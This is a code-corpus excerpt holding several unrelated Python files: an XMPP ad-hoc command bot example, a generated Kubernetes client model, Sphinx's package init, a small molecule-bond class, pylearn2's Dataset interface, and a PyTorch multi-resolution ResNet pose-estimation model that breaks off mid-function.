"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
SleekXMPP: The Sleek XMPP Library
Copyright (C) 2010 Nathanael C. Fritz
This file is part of SleekXMPP.
See the file LICENSE for copying permission.
"""
import sys
import logging
import getpass
from optparse import OptionParser
import sleekxmpp
# Python versions before 3.0 do not use UTF-8 encoding
# by default. To ensure that Unicode is handled properly
# throughout SleekXMPP, we will set the default encoding
# ourselves to UTF-8.
if sys.version_info < (3, 0):
reload(sys)
sys.setdefaultencoding('utf8')
else:
raw_input = input
class CommandBot(sleekxmpp.ClientXMPP):
"""
A simple SleekXMPP bot that provides a basic
adhoc command.
"""
def __init__(self, jid, password):
sleekxmpp.ClientXMPP.__init__(self, jid, password)
# The session_start event will be triggered when
# the bot establishes its connection with the server
# and the XML streams are ready for use. We want to
# listen for this event so that we we can initialize
# our roster.
self.add_event_handler("session_start", self.start)
def start(self, event):
"""
Process the session_start event.
Typical actions for the session_start event are
requesting the roster and broadcasting an initial
presence stanza.
Arguments:
event -- An empty dictionary. The session_start
event does not provide any additional
data.
"""
self.send_presence()
self.get_roster()
# We add the command after session_start has fired
# to ensure that the correct full JID is used.
# If using a component, may also pass jid keyword parameter.
self['xep_0050'].add_command(node='greeting',
name='Greeting',
handler=self._handle_command)
def _handle_command(self, iq, session):
"""
Respond to the initial request for a command.
Arguments:
iq -- The iq stanza containing the command request.
session -- A dictionary of data relevant to the command
session. Additional, custom data may be saved
here to persist across handler callbacks.
"""
form = self['xep_0004'].makeForm('form', 'Greeting')
form['instructions'] = 'Send a custom greeting to a JID'
form.addField(var='greeting',
ftype='text-single',
label='Your greeting')
session['payload'] = form
session['next'] = self._handle_command_complete
session['has_next'] = False
# Other useful session values:
# session['to'] -- The JID that received the
# command request.
# session['from'] -- The JID that sent the
# command request.
# session['has_next'] = True -- There are more steps to complete
# session['allow_complete'] = True -- Allow user to finish immediately
# and possibly skip steps
# session['cancel'] = handler -- Assign a handler for if the user
# cancels the command.
# session['notes'] = [ -- Add informative notes about the
# ('info', 'Info message'), command's results.
# ('warning', 'Warning message'),
# ('error', 'Error message')]
return session
def _handle_command_complete(self, payload, session):
"""
Process a command result from the user.
Arguments:
payload -- Either a single item, such as a form, or a list
of items or forms if more than one form was
provided to the user. The payload may be any
stanza, such as jabber:x:oob for out of band
data, or jabber:x:data for typical data forms.
session -- A dictionary of data relevant to the command
session. Additional, custom data may be saved
here to persist across handler callbacks.
"""
# In this case (as is typical), the payload is a form
form = payload
greeting = form['values']['greeting']
self.send_message(mto=session['from'],
mbody="%s, World!" % greeting,
mtype='chat')
# Having no return statement is the same as unsetting the 'payload'
# and 'next' session values and returning the session.
# Unless it is the final step, always return the session dictionary.
session['payload'] = None
session['next'] = None
return session
if __name__ == '__main__':
# Setup the command line arguments.
optp = OptionParser()
# Output verbosity options.
optp.add_option('-q', '--quiet', help='set logging to ERROR',
action='store_const', dest='loglevel',
const=logging.ERROR, default=logging.INFO)
optp.add_option('-d', '--debug', help='set logging to DEBUG',
action='store_const', dest='loglevel',
const=logging.DEBUG, default=logging.INFO)
optp.add_option('-v', '--verbose', help='set logging to COMM',
action='store_const', dest='loglevel',
const=5, default=logging.INFO)
# JID and password options.
optp.add_option("-j", "--jid", dest="jid",
help="JID to use")
optp.add_option("-p", "--password", dest="password",
help="password to use")
opts, args = optp.parse_args()
# Setup logging.
logging.basicConfig(level=opts.loglevel,
format='%(levelname)-8s %(message)s')
if opts.jid is None:
opts.jid = raw_input("Username: ")
if opts.password is None:
opts.password = getpass.getpass("Password: ")
# Setup the CommandBot and register plugins. Note that while plugins may
# have interdependencies, the order in which you register them does
# not matter.
xmpp = CommandBot(opts.jid, opts.password)
xmpp.register_plugin('xep_0030') # Service Discovery
xmpp.register_plugin('xep_0004') # Data Forms
xmpp.register_plugin('xep_0050') # Adhoc Commands
xmpp.register_plugin('xep_0199', {'keepalive': True, 'frequency':15})
# If you are working with an OpenFire server, you may need
# to adjust the SSL version used:
# xmpp.ssl_version = ssl.PROTOCOL_SSLv3
# If you want to verify the SSL certificates offered by a server:
# xmpp.ca_certs = "path/to/ca/cert"
# Connect to the XMPP server and start processing XMPP stanzas.
if xmpp.connect():
# If you do not have the dnspython library installed, you will need
# to manually specify the name of the server if it does not match
# the one in the JID. For example, to use Google Talk you would
# need to use:
#
# if xmpp.connect(('talk.google.com', 5222)):
# ...
xmpp.process(block=True)
print("Done")
else:
print("Unable to connect.")
| 36.263415
| 78
| 0.581383
|
31042d92f25f01f6e17ad8928ac9af0c89b28136
| 4,338
|
py
|
Python
|
kubernetes_asyncio/client/models/v1_host_path_volume_source.py
|
aK0nshin/kubernetes_asyncio
|
aef9edcc1f8671a5b1bba9f4684bde890176b19c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes_asyncio/client/models/v1_host_path_volume_source.py
|
aK0nshin/kubernetes_asyncio
|
aef9edcc1f8671a5b1bba9f4684bde890176b19c
|
[
"Apache-2.0"
] | null | null | null |
kubernetes_asyncio/client/models/v1_host_path_volume_source.py
|
aK0nshin/kubernetes_asyncio
|
aef9edcc1f8671a5b1bba9f4684bde890176b19c
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Kubernetes
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
OpenAPI spec version: v1.14.7
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class V1HostPathVolumeSource(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'path': 'str',
'type': 'str'
}
attribute_map = {
'path': 'path',
'type': 'type'
}
def __init__(self, path=None, type=None): # noqa: E501
"""V1HostPathVolumeSource - a model defined in OpenAPI""" # noqa: E501
self._path = None
self._type = None
self.discriminator = None
self.path = path
if type is not None:
self.type = type
@property
def path(self):
"""Gets the path of this V1HostPathVolumeSource. # noqa: E501
Path of the directory on the host. If the path is a symlink, it will follow the link to the real path. More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath # noqa: E501
:return: The path of this V1HostPathVolumeSource. # noqa: E501
:rtype: str
"""
return self._path
@path.setter
def path(self, path):
"""Sets the path of this V1HostPathVolumeSource.
Path of the directory on the host. If the path is a symlink, it will follow the link to the real path. More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath # noqa: E501
:param path: The path of this V1HostPathVolumeSource. # noqa: E501
:type: str
"""
if path is None:
raise ValueError("Invalid value for `path`, must not be `None`") # noqa: E501
self._path = path
@property
def type(self):
"""Gets the type of this V1HostPathVolumeSource. # noqa: E501
Type for HostPath Volume Defaults to \"\" More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath # noqa: E501
:return: The type of this V1HostPathVolumeSource. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this V1HostPathVolumeSource.
Type for HostPath Volume Defaults to \"\" More info: https://kubernetes.io/docs/concepts/storage/volumes#hostpath # noqa: E501
:param type: The type of this V1HostPathVolumeSource. # noqa: E501
:type: str
"""
self._type = type
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, V1HostPathVolumeSource):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 30.125
| 196
| 0.58391
|
6a2bcb25b07dd7947c822080c078d6886310af58
| 2,016
|
py
|
Python
|
sphinx/__init__.py
|
daobook/sphinx
|
ef8daca1f9a82ede9b4b0b5cde93f3414cee3dfe
|
[
"BSD-2-Clause"
] | null | null | null |
sphinx/__init__.py
|
daobook/sphinx
|
ef8daca1f9a82ede9b4b0b5cde93f3414cee3dfe
|
[
"BSD-2-Clause"
] | null | null | null |
sphinx/__init__.py
|
daobook/sphinx
|
ef8daca1f9a82ede9b4b0b5cde93f3414cee3dfe
|
[
"BSD-2-Clause"
] | null | null | null |
"""The Sphinx documentation toolchain."""
# Keep this file executable as-is in Python 3!
# (Otherwise getting the version out of it from setup.py is impossible.)
import os
import subprocess
import warnings
from os import path
from subprocess import PIPE
from .deprecation import RemovedInNextVersionWarning
# by default, all DeprecationWarning under sphinx package will be emit.
# Users can avoid this by using environment variable: PYTHONWARNINGS=
if 'PYTHONWARNINGS' not in os.environ:
warnings.filterwarnings('default', category=RemovedInNextVersionWarning)
# docutils.io using mode='rU' for open
warnings.filterwarnings('ignore', "'U' mode is deprecated",
DeprecationWarning, module='docutils.io')
__version__ = '4.5.0+'
__released__ = '4.5.0' # used when Sphinx builds its own docs
#: Version info for better programmatic use.
#:
#: A tuple of five elements; for Sphinx version 1.2.1 beta 3 this would be
#: ``(1, 2, 1, 'beta', 3)``. The fourth element can be one of: ``alpha``,
#: ``beta``, ``rc``, ``final``. ``final`` always has 0 as the last element.
#:
#: .. versionadded:: 1.2
#: Before version 1.2, check the string ``sphinx.__version__``.
version_info = (4, 5, 0, 'beta', 0)
package_dir = path.abspath(path.dirname(__file__))
__display_version__ = __version__ # used for command line version
if __version__.endswith('+'):
# try to find out the commit hash if checked out from git, and append
# it to __version__ (since we use this value from setup.py, it gets
# automatically propagated to an installed copy as well)
__display_version__ = __version__
__version__ = __version__[:-1] # remove '+' for PEP-440 version spec.
try:
ret = subprocess.run(['git', 'show', '-s', '--pretty=format:%h'],
cwd=package_dir,
stdout=PIPE, stderr=PIPE, encoding='ascii')
if ret.stdout:
__display_version__ += '/' + ret.stdout.strip()
except Exception:
pass
| 38.769231
| 76
| 0.679563
|
911c9688b93c6dad7b4867213b8981b6376d6ab2
| 2,284
|
py
|
Python
|
geometry_analysis/molecule.py
|
MadisonB14/geometry_analysis
|
69ce485c5c0ecdfd3202aa8a0290bc2fdc43f743
|
[
"BSD-3-Clause"
] | null | null | null |
geometry_analysis/molecule.py
|
MadisonB14/geometry_analysis
|
69ce485c5c0ecdfd3202aa8a0290bc2fdc43f743
|
[
"BSD-3-Clause"
] | null | null | null |
geometry_analysis/molecule.py
|
MadisonB14/geometry_analysis
|
69ce485c5c0ecdfd3202aa8a0290bc2fdc43f743
|
[
"BSD-3-Clause"
] | null | null | null |
"""
molecule.py
A python package for the MolSSI Software Summer School.
Contains a molecule class
"""
import numpy as np
from .measure import calculate_angle, calculate_distance
class Molecule:
def __init__(self, name, symbols, coordinates):
if isinstance(name, str):
self.name = name
else:
raise TypeError("Name is not a string.")
self.symbols = symbols
self._coordinates = coordinates
self.bonds = self.build_bond_list()
@property
def num_atoms(self):
return len(self.coordinates)
@property
def coordinates(self):
return self._coordinates
@coordinates.setter
def coordinates(self, new_coordinates):
self._coordinates = new_coordinates
self.bonds = self.build_bond_list()
def build_bond_list(self, max_bond=2.93, min_bond=0):
"""
Build a list of bonds based on a distance criteria.
Atoms within a specified distance of one another will be considered bonded.
Parameters
----------
max_bond : float, optional
min_bond : float, optional
Returns
-------
bond_list : list
List of bonded atoms. Returned as list of tuples where the values are the atom indices.
"""
bonds = {}
for atom1 in range(self.num_atoms):
for atom2 in range(atom1, self.num_atoms):
distance = calculate_distance(self.coordinates[atom1], self.coordinates[atom2])
if distance > min_bond and distance < max_bond:
bonds[(atom1, atom2)] = distance
return bonds
if __name__ == "__main__":
# Do something if this file is invoked on its own
#pass
random_coordinates = np.random.random([3, 3])
name = "my molecule"
symbols = ["H", "O", "H"]
my_molecule = Molecule(name, symbols, random_coordinates)
print(F'There are {len(my_molecule.bonds)} bonds')
print(F'The coordinates are {my_molecule.coordinates}')
#random_coordinates = np.random.random([3, 3])
random_coordinates[0] += 100
my_molecule.coordinates = random_coordinates
print(F'\n\nThe coordinates are {my_molecule.coordinates}')
print(F'There are {len(my_molecule.bonds)} bonds')
| 28.55
| 99
| 0.637916
|
d3bf9c9f8ef5235bf700fee144c566f3582c3f57
| 9,221
|
py
|
Python
|
pylearn2/datasets/dataset.py
|
BouchardLab/pylearn2
|
4cab785b870d22cd9e85a5f536d4cac234b6bf60
|
[
"BSD-3-Clause"
] | null | null | null |
pylearn2/datasets/dataset.py
|
BouchardLab/pylearn2
|
4cab785b870d22cd9e85a5f536d4cac234b6bf60
|
[
"BSD-3-Clause"
] | null | null | null |
pylearn2/datasets/dataset.py
|
BouchardLab/pylearn2
|
4cab785b870d22cd9e85a5f536d4cac234b6bf60
|
[
"BSD-3-Clause"
] | null | null | null |
"""
A module defining the Dataset class.
"""
class Dataset(object):
"""
Abstract interface for Datasets.
"""
def __iter__(self):
"""
.. todo::
WRITEME
"""
return self.iterator()
def iterator(self, mode=None, batch_size=None, num_batches=None,
rng=None, data_specs=None, return_tuple=False):
"""
Return an iterator for this dataset with the specified
behaviour. Unspecified values are filled-in by the default.
Parameters
----------
mode : str or object, optional
One of 'sequential', 'random_slice', or 'random_uniform',
*or* a class that instantiates an iterator that returns
slices or index sequences on every call to next().
batch_size : int, optional
The size of an individual batch. Optional if `mode` is
'sequential' and `num_batches` is specified (batch size
will be calculated based on full dataset size).
num_batches : int, optional
The total number of batches. Unnecessary if `mode` is
'sequential' and `batch_size` is specified (number of
batches will be calculated based on full dataset size).
rng : int, object or array_like, optional
Either an instance of `numpy.random.RandomState` (or
something with a compatible interface), or a seed value
to be passed to the constructor to create a `RandomState`.
See the docstring for `numpy.random.RandomState` for
details on the accepted seed formats. If unspecified,
defaults to using the dataset's own internal random
number generator, which persists across iterations
through the dataset and may potentially be shared by
multiple iterator objects simultaneously (see "Notes"
below).
data_specs : (space, source) pair, optional
`space` must be an instance of `Space` and `source` must be
a string or tuple of string names such as 'features' or
'targets'. The source names specify where the data will come
from and the Space specifies its format.
When source is a tuple, there are some additional requirements:
* `space` must be a `CompositeSpace`, with one sub-space
corresponding to each source name. i.e., the specification
must be flat.
* None of the components of `space` may be a `CompositeSpace`.
* Each corresponding (sub-space, source name) pair must be
unique, but the same source name may be mapped to many
sub-spaces (for example if one part of the model is fully
connected and expects a `VectorSpace`, while another part is
convolutional and expects a `Conv2DSpace`).
If `data_specs` is not provided, the behaviour (which
sources will be present, in which order and space, or
whether an Exception will be raised) is not defined and may
depend on the implementation of each `Dataset`.
return_tuple : bool, optional
In case `data_specs` consists of a single space and source,
if `return_tuple` is True, the returned iterator will return
a tuple of length 1 containing the minibatch of the data
at each iteration. If False, it will return the minibatch
itself. This flag has no effect if data_specs is composite.
Default: False.
Returns
-------
iter_obj : object
An iterator object implementing the standard Python
iterator protocol (i.e. it has an `__iter__` method that
return the object itself, and a `next()` method that
returns results until it raises `StopIteration`).
The `next()` method returns a batch containing data for
each of the sources required in `data_specs`, in the requested
`Space`.
Notes
-----
Arguments are passed as instantiation parameters to classes
that derive from `pylearn2.utils.iteration.SubsetIterator`.
Iterating simultaneously with multiple iterator objects
sharing the same random number generator could lead to
difficult-to-reproduce behaviour during training. It is
therefore *strongly recommended* that each iterator be given
its own random number generator with the `rng` parameter
in such situations.
When it is valid to call the `iterator` method with the default
value for all arguments, it makes it possible to use the `Dataset`
itself as an Python iterator, with the default implementation of
`Dataset.__iter__`. For instance, `DenseDesignMatrix` supports a
value of `None` for `data_specs`.
"""
# TODO: See how much of the logic from DenseDesignMatrix.iterator
# can be handled here.
raise NotImplementedError()
def adjust_for_viewer(self, X):
"""
Shift and scale a tensor, mapping its data range to [-1, 1].
It makes it possible for the transformed tensor to be displayed
with `pylearn2.gui.patch_viewer` tools.
Default is to do nothing.
Parameters
----------
X: `numpy.ndarray`
a tensor in the same space as the data
Returns
-------
`numpy.ndarray`
X shifted and scaled by a transformation that maps the data
range to [-1, 1].
Notes
-----
For example, for MNIST X will lie in [0,1] and the return value
should be X*2-1
"""
return X
def has_targets(self):
""" Returns true if the dataset includes targets """
raise NotImplementedError()
def get_topo_batch_axis(self):
"""
Returns the index of the axis that corresponds to different examples
in a batch when using topological_view.
"""
# Subclasses that support topological view must implement this to
# specify how their data is formatted.
raise NotImplementedError()
def get_batch_design(self, batch_size, include_labels=False):
"""
Returns a randomly chosen batch of data formatted as a design
matrix.
This method is not guaranteed to have any particular properties
like not repeating examples, etc. It is mostly useful for getting
a single batch of data for a unit test or a quick-and-dirty
visualization. Using this method for serious learning code is
strongly discouraged. All code that depends on any particular
example sampling properties should use Dataset.iterator.
.. todo::
Refactor to use `include_targets` rather than `include_labels`,
to make the terminology more consistent with the rest of the
library.
Parameters
----------
batch_size : int
The number of examples to include in the batch.
include_labels : bool
If True, returns the targets for the batch, as well as the
features.
Returns
-------
batch : member of feature space, or member of (feature, target) space.
Either numpy value of the features, or a (features, targets) tuple
of numpy values, depending on the value of `include_labels`.
"""
raise NotImplementedError(str(type(self)) + " does not implement "
"get_batch_design.")
def get_batch_topo(self, batch_size, include_labels=False):
"""
Returns a topology-preserving batch of data.
This method is not guaranteed to have any particular properties
like not repeating examples, etc. It is mostly useful for getting
a single batch of data for a unit test or a quick-and-dirty
visualization. Using this method for serious learning code is
strongly discouraged. All code that depends on any particular
example sampling properties should use Dataset.iterator.
.. todo::
Refactor to use `include_targets` rather than `include_labels`,
to make the terminology more consistent with the rest of the
library.
Parameters
----------
batch_size : int
The number of examples to include in the batch.
include_labels : bool
If True, returns the targets for the batch, as well as the
features.
Returns
-------
batch : member of feature space, or member of (feature, target) space.
Either numpy value of the features, or a (features, targets) tuple
of numpy values, depending on the value of `include_labels`.
"""
raise NotImplementedError()
def get_num_examples(self):
"""
Returns the number of examples in the dataset
Notes
-----
Infinite datasets have float('inf') examples.
"""
raise NotImplementedError()
| 39.917749
| 78
| 0.622167
|
7662bd41d1d62deeb34d070ff8d14168fb0edb77
| 19,315
|
py
|
Python
|
lib/models/multi_resnetohkm.py
|
sumaliqinghua/DSPNet
|
e82cc1938af65234471b6a139a8ac51f22de32a6
|
[
"MIT"
] | 5
|
2020-12-04T05:50:09.000Z
|
2022-01-14T12:37:44.000Z
|
lib/models/multi_resnetohkm.py
|
sumaliqinghua/DSPNet
|
e82cc1938af65234471b6a139a8ac51f22de32a6
|
[
"MIT"
] | 1
|
2021-01-28T03:20:00.000Z
|
2021-01-28T03:20:00.000Z
|
lib/models/multi_resnetohkm.py
|
sumaliqinghua/DSPNet
|
e82cc1938af65234471b6a139a8ac51f22de32a6
|
[
"MIT"
] | 3
|
2020-12-02T03:18:59.000Z
|
2021-09-12T11:29:19.000Z
|
# ------------------------------------------------------------------------------
# Copyright (c) Microsoft
# Licensed under the MIT License.
# Written by Bin Xiao (Bin.Xiao@microsoft.com)
# ------------------------------------------------------------------------------
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
# import os
import pprint
import os
import logging
import torch
import torch.nn as nn
# 【c】怎么接上的,怎么换其他
BN_MOMENTUM = 0.1 # bn层的不是adam那个
logger = logging.getLogger(__name__)
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(
in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False
)
class Depthwise(nn.Module):
def __init__(self, in_planes, out_planes, kernel_size=3, stride=1, padding=1, bias=False):
super(Depthwise, self).__init__()
self.conv_group = nn.Conv2d(in_planes, in_planes, kernel_size=kernel_size, stride=stride,
padding=padding, groups=in_planes, bias=bias)
self.conv_1x1 = nn.Conv2d(
in_planes, out_planes, kernel_size=1, bias=False)
def forward(self, x):
x = self.conv_group(x)
x = self.conv_1x1(x)
return x
class DwTrans(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=2, padding=1, output_padding=0, bias=False):
super(DwTrans, self).__init__()
self.in_channels = in_channels
self.conv_group = nn.ConvTranspose2d(
in_channels=in_channels,
out_channels=in_channels,
kernel_size=kernel_size,
stride=stride,
padding=padding,
output_padding=output_padding,
groups=in_channels,
bias=False
)
self.conv_1x1 = nn.Conv2d(
in_channels, out_channels, kernel_size=1, bias=False)
def forward(self, x):
# print(self.in_channels)
x = self.conv_group(x)
x = self.conv_1x1(x)
return x
# class SSEBlock(nn.Module):
# def __init__(self, inchannel):
# super(SSEBlock, self).__init__()
# self.spatial_se = nn.Sequential(nn.Conv2d(inchannel, 1, kernel_size=1,
# stride=1, padding=0, bias=False),
# nn.Sigmoid())
# def forward(self, x):
# # Returns a new tensor with the same data as the self tensor but of a different size.
# spa_se = self.spatial_se(x)#权重
# # spa_se = torch.mul(x, spa_se)#乘上权重后的结果;各自独立的话就要这一句
# return spa_se
import torch
import torch.nn as nn
# class SEBlock(nn.Module):
# def __init__(self, channel, reduction=16):
# super(SEBlock, self).__init__()
# self.avg_pool = nn.AdaptiveAvgPool2d(1)
# self.fcs = nn.Sequential(nn.Linear(channel, int(channel/reduction)),
# nn.LeakyReLU(negative_slope=0.1, inplace=True),
# nn.Linear(int(channel/reduction), channel),
# nn.Sigmoid())
# def forward(self, x):
# bahs, chs, _, _ = x.size()
# # Returns a new tensor with the same data as the self tensor but of a different size.
# y = self.avg_pool(x).view(bahs, chs)
# y = self.fcs(y).view(bahs, chs, 1, 1)
# return torch.mul(x, y)
# class SCSEBlock(nn.Module):
# def __init__(self, channel, reduction=16):
# super(SCSEBlock, self).__init__()
# self.avg_pool = nn.AdaptiveAvgPool2d(1)
# self.channel_excitation = nn.Sequential(nn.Linear(channel, int(channel//reduction)),
# nn.ReLU(inplace=True),
# nn.Linear(int(channel//reduction), channel),
# nn.Sigmoid())
# self.spatial_se = nn.Sequential(nn.Conv2d(channel, 1, kernel_size=1,
# stride=1, padding=0, bias=False),
# nn.Sigmoid())
# def forward(self, x):
# bahs, chs, _, _ = x.size()
# # Returns a new tensor with the same data as the self tensor but of a different size.
# chn_se = self.avg_pool(x).view(bahs, chs)
# chn_se = self.channel_excitation(chn_se).view(bahs, chs, 1, 1)
# chn_se = torch.mul(x, chn_se)
# spa_se = self.spatial_se(x)
# spa_se = torch.mul(x, spa_se)
# return torch.add(chn_se, 1, spa_se)
class BasicBlock(nn.Module):
expansion = 1 # 【c】哪儿用了
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.downsample = downsample
self.stride = stride # 【c】哪儿用了
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4 # 为啥是4,为啥要写出来;不是2?
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False) # 【see】
self.bn2 = nn.BatchNorm2d(planes, momentum=BN_MOMENTUM)
self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1,
bias=False)
self.bn3 = nn.BatchNorm2d(planes * self.expansion,
momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class MultiResNet(nn.Module):
def __init__(self, block, layers, cfg, **kwargs): # **kwargs代表什么含义
self.inplanes = 64
extra = cfg.MODEL.EXTRA
self.deconv_with_bias = extra.DECONV_WITH_BIAS # false
self.method = extra.LOSS_TYPE
super(MultiResNet, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False) # 【see】
self.bn1 = nn.BatchNorm2d(64, momentum=BN_MOMENTUM)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(
kernel_size=3, stride=2, padding=1)
# 【】这个换成conv
self.layer1 = self._make_layer(block, 64, layers[0]) # 3
# 从2开始每个layer的第一个bottlen分辨率下降2
self.layer2 = self._make_layer(block, 128, layers[1], stride=2) # 4
self.deconv_layers2 = self._make_deconv_layer(
extra.STAGE2.NUM_DECONV_LAYERS, # 3
extra.STAGE2.NUM_DECONV_FILTERS, # 256 256 256
extra.STAGE2.NUM_DECONV_KERNELS, # 4 4 4
)
# self.change_channel_2 =nn.Conv2d(
# in_channels=512, # 【】把deconv改为resnet对应的通道数
# out_channels=256,
# kernel_size=1, # 1
# stride=1,
# padding=0
# )
self.layer3 = self._make_layer(block, 256, layers[2], stride=2) # 6
self.deconv_layers3 = self._make_deconv_layer(
extra.STAGE3.NUM_DECONV_LAYERS, # 3
extra.STAGE3.NUM_DECONV_FILTERS, # 256 256 256
extra.STAGE3.NUM_DECONV_KERNELS, # 4 4 4
)
# self.change_channel_3 =nn.Conv2d(#参数量太大了:只有1M
# in_channels=1024, # 【】把deconv改为resnet对应的通道数
# out_channels=256,
# kernel_size=1, # 1
# stride=1,
# padding=0
# )
self.layer4 = self._make_layer(block, 512, layers[3], stride=2) # 3
self.deconv_layers4 = self._make_deconv_layer(
extra.STAGE4.NUM_DECONV_LAYERS, # 3
extra.STAGE4.NUM_DECONV_FILTERS, # 256 256 256
extra.STAGE4.NUM_DECONV_KERNELS, # 4 4 4
)
# self.sse_attention = SSEBlock(256)
# used for deconv layers
self.final_layer = nn.Conv2d(
in_channels=256, # 【】把deconv改为resnet对应的通道数
out_channels=cfg.MODEL.NUM_JOINTS,
kernel_size=extra.FINAL_CONV_KERNEL, # 1
stride=1,
padding=1 if extra.FINAL_CONV_KERNEL == 3 else 0 # 0
)
# self.channel_att2 = SCSEBlock(512,16)
# self.channel_att3 = SCSEBlock(1024,16)
# self.channel_att4 = SCSEBlock(2048,16)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
nn.Conv2d(self.inplanes, planes * block.expansion,
kernel_size=1, stride=stride, bias=False),
nn.BatchNorm2d(planes * block.expansion, momentum=BN_MOMENTUM),
) # 保持分辨率 通道一致
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for i in range(1, blocks):
layers.append(block(self.inplanes, planes))
# print(i,self.inplanes)
return nn.Sequential(*layers)
def _get_deconv_cfg(self, deconv_kernel, index):
if deconv_kernel == 4:
padding = 1
output_padding = 0
elif deconv_kernel == 3:
padding = 1
output_padding = 1 # 【】这啥
elif deconv_kernel == 2:
padding = 0
output_padding = 0
return deconv_kernel, padding, output_padding
def _make_deconv_layer(self, num_layers, num_filters, num_kernels):
assert num_layers == len(num_filters), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
assert num_layers == len(num_kernels), \
'ERROR: num_deconv_layers is different len(num_deconv_filters)'
layers = []
in_channels = self.inplanes
for i in range(num_layers): # 只3个?
kernel, padding, output_padding = \
self._get_deconv_cfg(num_kernels[i], i) # 返回4 1 0
planes = num_filters[i] # 256 256 256
layers.append(
nn.Sequential(
DwTrans(
in_channels,
out_channels=planes,
kernel_size=kernel,
stride=2,
padding=padding,
output_padding=output_padding,
bias=self.deconv_with_bias),
nn.BatchNorm2d(planes, momentum=BN_MOMENTUM),
nn.ReLU(inplace=True),
# 新增后面的卷积
# nn.Conv2d(256,256,3,1,1),
# nn.BatchNorm2d(256, momentum=BN_MOMENTUM),
# nn.ReLU(inplace=True),
# nn.Conv2d(256,256,3,1,1),
# nn.BatchNorm2d(256, momentum=BN_MOMENTUM),
# nn.ReLU(inplace=True),
))
in_channels = planes
return nn.ModuleList(layers) # 【see】改
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
# print(self.inplanes)
x1 = self.layer1(x)
# print(x.shape)
# print(self.inplanes)
x2 = self.layer2(x1)
# print(x.shape)
# print(self.inplanes)
x3 = self.layer3(x2)
# print(x.shape)
x4 = self.layer4(x3) # 前4层就是一般的resnet结构?:是
# print(x.shape,'over')
# x2 = self.channel_att2(x2)
xd2 = self.deconv_layers2[0](x2) # 跳接+x1
# x2 = self.change_channel_2(x2)
# x3 = self.channel_att3(x3)
xd3_first = self.deconv_layers3[0](x3)
# print(len(self.deconv_layers3),xd3_first.shape,xd2.shape)
xd3 = self.deconv_layers3[1](xd3_first)
# x3 =self.change_channel_3(x3)#deconv3用了之后再改通道
# x4 = self.channel_att4(x4)
xd4 = self.deconv_layers4[0](x4)
xd4 = self.deconv_layers4[1](xd4) # x2还是xd3_first
xd4 = self.deconv_layers4[2](xd4)#还是xd3??
# #深指导浅 #【l】
# xd4 = torch.mul(xd4,self.sse_attention(xd4))
# xd3 = torch.mul(xd3,self.sse_attention(xd3))
# xd2 = torch.mul(xd2,self.sse_attention(xd2))#顶部
#钱指导深 #【c】
# xd4 = torch.mul(xd4,self.sse_attention(xd2))
